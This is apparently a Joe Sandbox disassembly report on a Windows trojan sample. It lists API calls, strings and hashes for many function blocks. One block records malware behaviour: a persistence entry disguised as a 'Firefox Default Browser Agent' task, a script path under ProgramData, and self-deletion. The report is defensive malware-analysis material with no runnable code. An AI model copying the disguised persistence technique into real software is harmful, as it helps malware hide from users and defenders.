            • Opcode Fuzzy Hash: cb21f007a609bf1eba6dd406c1e2aba63e346896e1428c623c41a895d7f23d22
            • Instruction Fuzzy Hash: CE414670D0465CDECF14CFB8D999BBDBBB0FB44308F20412AE512EA280DB759A44DB55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            • zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 008F2029
            • * , xrefs: 008F2022
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traits
            • String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
            • API String ID: 1455298312-2972419988
            • Opcode ID: 687d1068cca64391625db430252f3576b080dea02f023b8a3146df8998ec1c2e
            • Instruction ID: b9300946d3de5076a998dd0ea19683a53020a141d2f9874d6fa1844d3a4472c1
            • Opcode Fuzzy Hash: 687d1068cca64391625db430252f3576b080dea02f023b8a3146df8998ec1c2e
            • Instruction Fuzzy Hash: 70115B31904A4CDACB04DFA8D855BEEFBB4FB48714F00821AE821B72D1EF355608CB55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,008F75D9,?,?,008F75A1,?,?,?), ref: 008F763C
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008F764F
            • FreeLibrary.KERNEL32(00000000,?,?,008F75D9,?,?,008F75A1,?,?,?), ref: 008F7672
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: ddecc26e1ce04a6b2b86fc87cab85a103a1cce8fb5ce8276d73c7cf26a0d6e06
            • Instruction ID: 9ffce94cba44f292d77da8b77dcce4ed2e1a61e3f3b2f0056fb86038cf0dbd6c
            • Opcode Fuzzy Hash: ddecc26e1ce04a6b2b86fc87cab85a103a1cce8fb5ce8276d73c7cf26a0d6e06
            • Instruction Fuzzy Hash: 9FF08C31A19719FFDB119B64DC09BAE7AB9FB4479AF000160FA01E21A0DB748E40EA90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • wnsprintfW.SHLWAPI ref: 02B8721F
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 02B8723B
              • Part of subcall function 02B86AA0: VariantInit.OLEAUT32(?), ref: 02B86AB7
              • Part of subcall function 02B86AA0: CoCreateInstance.OLE32(02B81020,00000000,00000001,02B81000,?), ref: 02B86AD4
              • Part of subcall function 02B86AA0: SysAllocString.OLEAUT32(\Mozilla), ref: 02B86B14
              • Part of subcall function 02B86AA0: SysFreeString.OLEAUT32(?), ref: 02B86B4B
              • Part of subcall function 02B86AA0: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 02B86B58
              • Part of subcall function 02B86AA0: SysFreeString.OLEAUT32(00000000), ref: 02B86B6F
              • Part of subcall function 02B89070: GetFileAttributesW.KERNEL32(?,02B87251), ref: 02B89071
            • DeleteFileW.KERNEL32(?), ref: 02B8725C
            • ExitProcess.KERNEL32 ref: 02B87264
            Strings
            • %%ProgramData%%\r%Sr.js, xrefs: 02B87214
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
            • String ID: %%ProgramData%%\r%Sr.js
            • API String ID: 3376550436-2368859843
            • Opcode ID: 238c4f9807776e8e2f8d19727db85a51a1ac0e26597375b59bd6538138273781
            • Instruction ID: 16e8f2add3899edccbbbb43e339cad42991f14d7fdd3a227df3611482ed5bd39
            • Opcode Fuzzy Hash: 238c4f9807776e8e2f8d19727db85a51a1ac0e26597375b59bd6538138273781
            • Instruction Fuzzy Hash: D0F0FEB1850208A7DB10FBA0CC4DED9776CAB04749F4009E1B66EE6192EAB096D5CE55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _free.LIBCMT ref: 008F9D45
              • Part of subcall function 008F7FB2: HeapFree.KERNEL32(00000000,00000000,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?), ref: 008F7FC8
              • Part of subcall function 008F7FB2: GetLastError.KERNEL32(?,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?,?), ref: 008F7FDA
            • _free.LIBCMT ref: 008F9D57
            • _free.LIBCMT ref: 008F9D69
            • _free.LIBCMT ref: 008F9D7B
            • _free.LIBCMT ref: 008F9D8D
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 7e2324108af4d6b32ca5b0dec8fc4dc77484885fa40ada6fcfac823917a079c8
            • Instruction ID: 986e2abbe40237c8bb2a9a0153b58951cb93eb90f6804d007a63885e6cd478ef
            • Opcode Fuzzy Hash: 7e2324108af4d6b32ca5b0dec8fc4dc77484885fa40ada6fcfac823917a079c8
            • Instruction Fuzzy Hash: BCF0F97261D608ABD634FB7CE886D3AB3E9FA007107654809F688D7611CF31FCC08A65
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
            • API String ID: 0-1324067227
            • Opcode ID: 61bd9ed9e251bf99d7099b86f016c77a274912fe92f402e5c9eec3aa632e3e8e
            • Instruction ID: 0d59866d35c6dd19bd583e5490de383dedc6877ab6948998414dd81482d399db
            • Opcode Fuzzy Hash: 61bd9ed9e251bf99d7099b86f016c77a274912fe92f402e5c9eec3aa632e3e8e
            • Instruction Fuzzy Hash: CA31AF71A1421DEFCB21DFADD885DBEBBB8FB85710B20026AE600D7251EB709A50DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,008F6163,00000000,?,00908D08,?,?,?,008F6306,00000004,InitializeCriticalSectionEx,00901C98,InitializeCriticalSectionEx), ref: 008F61BF
            • GetLastError.KERNEL32(?,008F6163,00000000,?,00908D08,?,?,?,008F6306,00000004,InitializeCriticalSectionEx,00901C98,InitializeCriticalSectionEx,00000000,?,008F60BD), ref: 008F61C9
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 008F61F1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID: api-ms-
            • API String ID: 3177248105-2084034818
            • Opcode ID: 0657cad8f66c020a2b1f71bbda449ff5cec999a4ecf5c86aced094c577f80b0f
            • Instruction ID: 3ba8019379219b8de5e82f16c6c509f82fdfd5c6bccd7d735a75b8eca5070bdf
            • Opcode Fuzzy Hash: 0657cad8f66c020a2b1f71bbda449ff5cec999a4ecf5c86aced094c577f80b0f
            • Instruction Fuzzy Hash: B4E04F3029420DBBEF202B70ED06B693E6AEB01B40F104530FB4DE80E3EB61D9E1A595
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: 169dd8d22fd108f2c0e810282b12e60ab454aa7f3af79ef904bb5e4a833edbfb
            • Instruction ID: ff6888e10815792913489737001d9fd556b163bdb367aa54f423b44e57ae93c2
            • Opcode Fuzzy Hash: 169dd8d22fd108f2c0e810282b12e60ab454aa7f3af79ef904bb5e4a833edbfb
            • Instruction Fuzzy Hash: D351B172605A0EAFDB299F78D841BBAB7A4FF44314F24422DEB01D7291E731AD80D791
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLastError.KERNEL32(?,?,?,008FC440,?,00000001,008FAD76,?,008FC8FA,00000001,?,?,?,008FAD05,?,?), ref: 008F832F
            • _free.LIBCMT ref: 008F838C
            • _free.LIBCMT ref: 008F83C2
            • SetLastError.KERNEL32(00000000,00000005,000000FF,?,008FC8FA,00000001,?,?,?,008FAD05,?,?,?,00907520,0000002C,008FAD76), ref: 008F83CD
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast_free
            • String ID:
            • API String ID: 2283115069-0
            • Opcode ID: d5e3deda8d579c705d8b7184559bdf17653d37c05a2a45dc5e045c5a8ec17459
            • Instruction ID: dafac120a1458f09c5702153f7c12413e59e7ac2f833ef1809a4d2fb17b6182c
            • Opcode Fuzzy Hash: d5e3deda8d579c705d8b7184559bdf17653d37c05a2a45dc5e045c5a8ec17459
            • Instruction Fuzzy Hash: 9A11C2B331860EAED71526BC5C85E3F276AFBC1B747280A24F724C62F2DE258C095122
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLastError.KERNEL32(?,008F11AD,?,008F8822,008F85BF,?,?,008F11AD,?), ref: 008F8486
            • _free.LIBCMT ref: 008F84E3
            • _free.LIBCMT ref: 008F8519
            • SetLastError.KERNEL32(00000000,00000005,000000FF,?,008F11AD,?,008F8822,008F85BF,?,?,008F11AD,?), ref: 008F8524
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast_free
            • String ID:
            • API String ID: 2283115069-0
            • Opcode ID: 0bce32d82cf44a19dfa0ff862f4c04eac2782ba8db478cf585cda07e54c8d6c1
            • Instruction ID: 434651f3c25c719026a0d491d5582972a7e566fd2a30449c52aa1a0a1302e36f
            • Opcode Fuzzy Hash: 0bce32d82cf44a19dfa0ff862f4c04eac2782ba8db478cf585cda07e54c8d6c1
            • Instruction Fuzzy Hash: 3B1126B231860EAFD7212BBC9C85E7B2769FBD17747280624F728C61E2DE25CC456136
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,008FCF35,?,00000001,?,00000001,?,008FC3CF,?,?,00000001), ref: 008FD4ED
            • GetLastError.KERNEL32(?,008FCF35,?,00000001,?,00000001,?,008FC3CF,?,?,00000001,?,00000001,?,008FC91B,008FAD05), ref: 008FD4F9
              • Part of subcall function 008FD4BF: CloseHandle.KERNEL32(FFFFFFFE,008FD509,?,008FCF35,?,00000001,?,00000001,?,008FC3CF,?,?,00000001,?,00000001), ref: 008FD4CF
            • ___initconout.LIBCMT ref: 008FD509
              • Part of subcall function 008FD481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,008FD4B0,008FCF22,00000001,?,008FC3CF,?,?,00000001,?), ref: 008FD494
            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,008FCF35,?,00000001,?,00000001,?,008FC3CF,?,?,00000001,?), ref: 008FD51E
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
            • String ID:
            • API String ID: 2744216297-0
            • Opcode ID: 94351839feb79a319ed9821aa456d99c47202e35395fac5960835ea64ec83468
            • Instruction ID: 09c6e84c45f7fa549479f5b1310c28f9a6984efe64b6c7c2ee0bcd49042a3078
            • Opcode Fuzzy Hash: 94351839feb79a319ed9821aa456d99c47202e35395fac5960835ea64ec83468
            • Instruction Fuzzy Hash: 89F0AC3651526CBFCF222FA5DC04A9A3F76FB197A1B148110FF5895120CA329860FB95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _free.LIBCMT ref: 008F7C74
              • Part of subcall function 008F7FB2: HeapFree.KERNEL32(00000000,00000000,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?), ref: 008F7FC8
              • Part of subcall function 008F7FB2: GetLastError.KERNEL32(?,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?,?), ref: 008F7FDA
            • _free.LIBCMT ref: 008F7C87
            • _free.LIBCMT ref: 008F7C98
            • _free.LIBCMT ref: 008F7CA9
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 8d56b34c02cd1f66e8f23b95603cd1ea907d3afa3375658ece27b120110dfc81
            • Instruction ID: 14cf6a794e568fc87e19c392406a0cf759d2dd6159e8dd5279b3a520d9a63a1d
            • Opcode Fuzzy Hash: 8d56b34c02cd1f66e8f23b95603cd1ea907d3afa3375658ece27b120110dfc81
            • Instruction Fuzzy Hash: 74E09A7152C16A9ED6526F38AC49495BB26E7447107424046FA41D6333CA3505D2BBA2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008F57A5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID: MOC$RCC
            • API String ID: 2118026453-2084237596
            • Opcode ID: a9ff7fb7700d26fb4391f36c8f0d17a2774140f3eb5aef45cdecb88a911d256d
            • Instruction ID: 46b7fdaaee46921048aef50179c97901dba1271b2aa040e1d5f88e27e3cd620f
            • Opcode Fuzzy Hash: a9ff7fb7700d26fb4391f36c8f0d17a2774140f3eb5aef45cdecb88a911d256d
            • Instruction Fuzzy Hash: AF41783190060DEFDF15DFA8C881AAEBBB5FF48340F188069FB05A6211D3359A50DB51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleA.KERNEL32(kernel32), ref: 008F111B
            • GetModuleHandleW.KERNEL32(00000000), ref: 008F1162
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule
            • String ID: kernel32
            • API String ID: 4139908857-541877477
            • Opcode ID: d1e6d2f0e7bcb1cadf5a67b56a4d75ad8be1b5241e614c1243f490406f5b93df
            • Instruction ID: 2c11b1d14579ff0cf7429e6b1c1460b6d69a91a2f0d15a5ed827c396c995d828
            • Opcode Fuzzy Hash: d1e6d2f0e7bcb1cadf5a67b56a4d75ad8be1b5241e614c1243f490406f5b93df
            • Instruction Fuzzy Hash: 0E2194B5D0020CEBCF04DFE8D949AEEBBB4FB48305F108559EA15A7240E6359A85CB65
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 008F3040: char_traits.LIBCPMTD ref: 008F3080
            • task.LIBCPMTD ref: 008F2AB3
            • task.LIBCPMTD ref: 008F2AC2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traits
            • String ID: dboupzalsfzwvwpyqdpu
            • API String ID: 1455298312-2047172133
            • Opcode ID: 6ccdabe5ea09c648e4856f32b4649a3fe6840c6ad2ef8a7259e5f9099240f1c0
            • Instruction ID: 8c1b256f6464b0af317d745848640bcd5b80e8cf85fff5f879d5182d04f38648
            • Opcode Fuzzy Hash: 6ccdabe5ea09c648e4856f32b4649a3fe6840c6ad2ef8a7259e5f9099240f1c0
            • Instruction Fuzzy Hash: B301697191464CEFCB00DF68D841BAEBBB4FB45724F00466AE820A73C0DB75AB04CB95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 008F3040: char_traits.LIBCPMTD ref: 008F3080
            • task.LIBCPMTD ref: 008F2A43
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: char_traitstask
            • String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
            • API String ID: 3039116899-104439280
            • Opcode ID: 90bc4832e07946e0bbb663ba3fdf060fed68169371908de20ed6c7e0792ded91
            • Instruction ID: f956186fbdac30ee964fdedaf007cbcd2db3e27660067f2f71971868b86309a3
            • Opcode Fuzzy Hash: 90bc4832e07946e0bbb663ba3fdf060fed68169371908de20ed6c7e0792ded91
            • Instruction Fuzzy Hash: DFF04970D0420C8ADB14DFB8D5557FEB7B0FB48308F104069D602B6281DA769E18DB6A
            Uniqueness

            Uniqueness Score: -1.00%